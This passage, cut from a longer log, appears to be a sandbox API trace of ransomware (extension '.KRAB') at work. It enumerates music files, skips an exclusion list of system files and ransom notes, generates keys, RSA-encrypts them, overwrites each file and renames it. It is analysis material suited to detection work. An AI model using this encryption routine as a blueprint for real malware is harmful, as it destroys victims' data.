dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0094.147] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.147] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.148] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x12b90, lpOverlapped=0x0) returned 1 [0094.164] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffed470, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.164] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x12b90, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x12b90, lpOverlapped=0x0) returned 1 [0094.164] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0094.164] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.168] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.169] CloseHandle (hObject=0x43c) returned 1 [0094.169] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.169] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2cnPMt Py.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\d2cnpmt py.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2cnPMt Py.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\d2cnpmt py.wav.krab")) returned 1 [0094.170] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.171] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.171] lstrcmpW (lpString1="i_PKOGJ2XV.wav", lpString2=".") returned 1 [0094.171] lstrcmpW (lpString1="i_PKOGJ2XV.wav", lpString2="..") returned 1 [0094.171] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\", lpString2="i_PKOGJ2XV.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\i_PKOGJ2XV.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\i_PKOGJ2XV.wav" [0094.171] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.171] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\i_PKOGJ2XV.wav.KRAB") returned 74 [0094.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\i_PKOGJ2XV.wav") returned 69 [0094.171] lstrlenW (lpString=".wav") returned 4 [0094.171] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.172] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0094.172] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.172] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\i_PKOGJ2XV.wav") returned 69 [0094.172] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\i_PKOGJ2XV.wav") returned 69 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="desktop.ini") returned 1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="autorun.inf") returned 1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="ntuser.dat") returned -1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="iconcache.db") returned -1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="bootsect.bak") returned 1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="boot.ini") returned 1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="ntuser.dat.log") returned -1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="thumbs.db") returned -1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="ntldr") returned -1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="NTDETECT.COM") returned -1 [0094.172] lstrcmpiW (lpString1="i_PKOGJ2XV.wav", lpString2="Bootfont.bin") returned 1 [0094.172] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.173] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010f08) returned 1 [0094.173] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.174] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.174] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.174] CryptGenRandom (in: hProv=0x1010f08, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0094.174] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0094.174] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.174] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011678) returned 1 [0094.175] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.175] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.175] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.175] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0094.175] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0094.175] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.176] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011898) returned 1 [0094.176] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbe0a0) returned 1 [0094.176] CryptGetKeyParam (in: hKey=0xfbe0a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.176] CryptEncrypt (in: hKey=0xfbe0a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.177] GetLastError () returned 0x0 [0094.177] CryptDestroyKey (hKey=0xfbe0a0) returned 1 [0094.177] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.177] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10110a0) returned 1 [0094.177] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdae0) returned 1 [0094.177] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.177] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.178] GetLastError () returned 0x0 [0094.178] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0094.178] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0094.178] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\i_PKOGJ2XV.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\i_pkogj2xv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0094.178] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.211] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.211] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x9335, lpOverlapped=0x0) returned 1 [0094.225] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff6ccb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.225] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x9335, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x9335, lpOverlapped=0x0) returned 1 [0094.225] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0094.225] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.229] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.230] CloseHandle (hObject=0x43c) returned 1 [0094.232] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.232] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\i_PKOGJ2XV.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\i_pkogj2xv.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\i_PKOGJ2XV.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\i_pkogj2xv.wav.krab")) returned 1 [0094.233] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.234] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.234] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0094.234] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0094.234] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\KRAB-DECRYPT.txt" [0094.234] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.234] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\KRAB-DECRYPT.txt.KRAB") returned 76 [0094.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\KRAB-DECRYPT.txt") returned 71 [0094.234] lstrlenW (lpString=".txt") returned 4 [0094.234] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.234] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0094.235] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.235] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\KRAB-DECRYPT.txt") returned 71 [0094.235] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\KRAB-DECRYPT.txt") returned 71 [0094.235] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.235] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.235] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0094.235] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.235] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.235] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.235] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0094.235] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0094.235] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0094.235] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0094.235] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.236] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.236] lstrcmpW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2=".") returned 1 [0094.236] lstrcmpW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="..") returned 1 [0094.236] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\", lpString2="LbU7_5tdOb5wKqaG.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\LbU7_5tdOb5wKqaG.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\LbU7_5tdOb5wKqaG.mp3" [0094.236] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.236] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\LbU7_5tdOb5wKqaG.mp3.KRAB") returned 80 [0094.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\LbU7_5tdOb5wKqaG.mp3") returned 75 [0094.236] lstrlenW (lpString=".mp3") returned 4 [0094.236] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.236] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0094.237] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.237] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\LbU7_5tdOb5wKqaG.mp3") returned 75 [0094.237] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\LbU7_5tdOb5wKqaG.mp3") returned 75 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="desktop.ini") returned 1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="autorun.inf") returned 1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="ntuser.dat") returned -1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="iconcache.db") returned 1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="bootsect.bak") returned 1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="boot.ini") returned 1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="ntuser.dat.log") returned -1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="thumbs.db") returned -1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="ntldr") returned -1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="NTDETECT.COM") returned -1 [0094.237] lstrcmpiW (lpString1="LbU7_5tdOb5wKqaG.mp3", lpString2="Bootfont.bin") returned 1 [0094.238] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.238] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10112c0) returned 1 [0094.238] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.239] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.239] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.239] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0094.239] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0094.239] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.239] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011238) returned 1 [0094.240] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.240] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.240] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.241] CryptGenRandom (in: hProv=0x1011238, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0094.241] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0094.241] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.241] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011898) returned 1 [0094.242] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdfe0) returned 1 [0094.242] CryptGetKeyParam (in: hKey=0xfbdfe0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.242] CryptEncrypt (in: hKey=0xfbdfe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.242] GetLastError () returned 0x0 [0094.242] CryptDestroyKey (hKey=0xfbdfe0) returned 1 [0094.242] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.242] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0094.243] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdae0) returned 1 [0094.243] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.243] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.243] GetLastError () returned 0x0 [0094.243] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0094.243] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.243] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\LbU7_5tdOb5wKqaG.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\lbu7_5tdob5wkqag.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0094.244] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.244] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.244] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x8259, lpOverlapped=0x0) returned 1 [0094.260] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff7da7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.260] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x8259, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x8259, lpOverlapped=0x0) returned 1 [0094.260] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0094.260] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.267] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.267] CloseHandle (hObject=0x43c) returned 1 [0094.267] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.268] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\LbU7_5tdOb5wKqaG.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\lbu7_5tdob5wkqag.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\LbU7_5tdOb5wKqaG.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\lbu7_5tdob5wkqag.mp3.krab")) returned 1 [0094.269] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.269] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.269] lstrcmpW (lpString1="m7c7gt62.m4a", lpString2=".") returned 1 [0094.269] lstrcmpW (lpString1="m7c7gt62.m4a", lpString2="..") returned 1 [0094.269] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\", lpString2="m7c7gt62.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\m7c7gt62.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\m7c7gt62.m4a" [0094.269] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.269] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\m7c7gt62.m4a.KRAB") returned 72 [0094.269] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\m7c7gt62.m4a") returned 67 [0094.269] lstrlenW (lpString=".m4a") returned 4 [0094.270] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.270] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".m4a ") returned 5 [0094.270] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.270] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\m7c7gt62.m4a") returned 67 [0094.270] lstrlenW 